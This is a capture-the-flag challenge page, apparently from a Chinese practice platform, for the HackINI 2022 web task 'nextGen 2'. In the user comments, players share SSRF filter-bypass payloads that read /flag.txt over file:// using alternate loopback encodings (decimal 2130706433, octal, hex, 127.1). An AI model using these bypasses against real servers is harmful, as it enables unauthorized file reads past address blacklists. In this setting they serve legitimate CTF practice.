nextGen 2WEB 未解决

分数: 0 金币: 0
所属赛事: HackINI 2022
题目作者: 未知
一  血: freetstar
一血奖励: 0金币
解  决: 1494
提  示: Flag is in the `/flag.txt` file of the web server
描  述:
We added some filters now.
评论
babydon‘tcry 14天前

没想到随便加个0就绕过了

回复 0

GNMO 7月前

file叫本地文件传输协议file://127.0.0.1/C:/ 本地C盘 file://localhost/D:/ 本地D盘 file:///E:/ 本地E盘

回复 1

Aerelin 10月前

为什么改完包发送依旧拿不到flag

回复 0

bugfuck2 1年前

service=file://127.0.0.01/flag.txt

回复 1

bugku111222 1年前

bp中修改了这些,为什么一直响应400? POST /request HTTP/1.1 Content-Type: application/x-www-form-urlencode service=file:///127.0.1/flag.txt

回复 0
xingzou 4月前

感觉应该是//127.1/flag吧

回复 0

零基础110 1年前

shellmates{**********}

回复 0

2ew123123124 1年前

shellmates{******}

回复 0

lunarbyside 1年前

所以为啥想当然觉得过滤了127.0.0.1啊,怎么想到的,可以过滤的地方多了去了

回复 4

脆脆sha_ 1年前

黑名单过滤的ip地址绕过: 十进制整数表示:2130706433 八进制表示:0177.0.0.1 十六进制表示:0x7f.0x0.0x0.0x1 省略IP的某些部分:127.1

回复 1
divinesh 1年前

niude

回复 0

意大利炮 1年前

service=file://127.00.00.1/flag.txt和service=file://2130706433/flag.txt

回复 4

WriteUp

image
hopeinhand

1 金币

评分(2)

解题动态

秋叶沙沙 攻破了该题 1天前
寤闈 攻破了该题 1天前
raven111 攻破了该题 8天前
i8vkmmju 攻破了该题 10天前
Redlover 攻破了该题 10天前
Wh1teSu 攻破了该题 10天前
我不吃鱼肉了 攻破了该题 11天前
pinus 攻破了该题 13天前
bed77574 攻破了该题 13天前
zwzwzwz 攻破了该题 13天前
我是小悦主人 攻破了该题 14天前
xiaodou 攻破了该题 14天前
babydon‘tcry 攻破了该题 14天前
xiaoxiang07 攻破了该题 14天前
liaty 攻破了该题 17天前
Jay. 攻破了该题 17天前
gdrhdr 攻破了该题 18天前
AITester 攻破了该题 18天前
Vluae 攻破了该题 20天前
cc.cou 攻破了该题 20天前
问题反馈